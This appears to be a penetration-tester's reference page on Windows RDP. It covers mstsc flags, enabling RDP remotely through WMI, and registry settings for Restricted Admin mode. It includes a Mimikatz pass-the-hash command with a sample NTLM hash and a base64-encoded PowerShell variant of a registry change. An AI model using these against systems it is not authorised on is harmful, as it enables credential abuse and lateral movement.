# Remote Desktop Protocol (RDP)

## Overview

> RDP (Remote Desktop Protocol) is a network communications protocol developed by Microsoft, which allows users to connect to another computer from a remote location.

## Using mstsc

To connect to a session in full-screen mode, type:

```powershell
mstsc /v:computer1 /f
```

## Using /admin and /restrictedAdmin

{% hint style="info" %}
Connecting to a workstation with Remote Desktop will disconnect any existing session. The /admin flag allows us to connect to the *admin* session, which does not disconnect the current user if we perform the login with the same user.
{% endhint %}

Connects you to a session for administering the server.

```powershell
mstsc /v:computer1 /f /admin
```

{% hint style="info" %}
Connecting to a workstation with /restrictedAdmin won't send your credentials to the remote PC. \
\
This mode won't send your credentials to the remote PC, which can protect you if you connect to a compromised device. Connections made from the remote PC might not be authenticated by other PCs, which impact application functionality and compatibility. The **/admin** parameter is implied.\
\
Microsoft introduced RDP with *restricted admin mode*, which allows system administrators to perform a *network login* with RDP.

\
When we supply this argument, the current login session is used to authenticate the session.
{% endhint %}

{% hint style="warning" %}
Restricted admin mode is disabled by default.&#x20;

We can enable this through the `DisableRestrictedAdmin` registries at the following path:

```
HKLM:\System\CurrentControlSet\Control\Lsa
```

{% endhint %}

## Command examples

### RDP manament through WMI

#### Checking if RDP is allowed.

{% hint style="info" %}
AllowTSConnections(0 – disable, 1 – enable)
{% endhint %}

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01 -Credential $creds 
$tsobj.AllowTSConnections
```

{% endcode %}

#### Enabling AllowTSConnections (RDP) through WMI

{% code overflow="wrap" %}

```powershell
$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
$tsobj.SetAllowTSConnections(1,1)
```

{% endcode %}

#### Disabling AllowTSConnections (RDP) through WMI

<pre class="language-powershell" data-overflow="wrap"><code class="lang-powershell"><strong>$tsobj = Get-WmiObject -Class Win32_TerminalServiceSetting -Namespace Root\CimV2\TerminalServices -ComputerName SERVER01
</strong>$tsobj.SetAllowTSConnections(0,0)
</code></pre>

### Restricted admin

#### Using restricted admin to perform pass the hash.

{% code overflow="wrap" %}

```powershell
sekurlsa::pth /user:admin /domain:corp1 /ntlm:2892D26CDF84D7A70E2EB3B9F05C425E /run:"mstsc.exe /restrictedadmin"
```

{% endcode %}

#### Disabling restricted admin through registries.

{% code overflow="wrap" %}

```powershell
Remove-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin
```

{% endcode %}

#### Enabling restricted admin through registries

{% code overflow="wrap" %}

```powershell
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" -Name DisableRestrictedAdmin -Value 0
```

{% endcode %}

Base64 encoded:

{% code overflow="wrap" %}

```powershell
powershell -enc TgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgAEgASwBMAE0AOgBcAFMAeQBzAHQAZQBtAFwAQwB1AHIAcgBlAG4AdABDAG8AbgB0AHIAbwBsAFMAZQB0AFwAQwBvAG4AdAByAG8AbABcAEwAcwBhACAALQBOAGEAbQBlACAARABpAHMAYQBiAGwAZQBSAGUAcwB0AHIAaQBjAHQAZQBkAEEAZABtAGkAbgAgAC0AVgBhAGwAdQBlACAAMAA=
```

{% endcode %}

## References&#x20;

{% embed url="<https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mstsc>" %}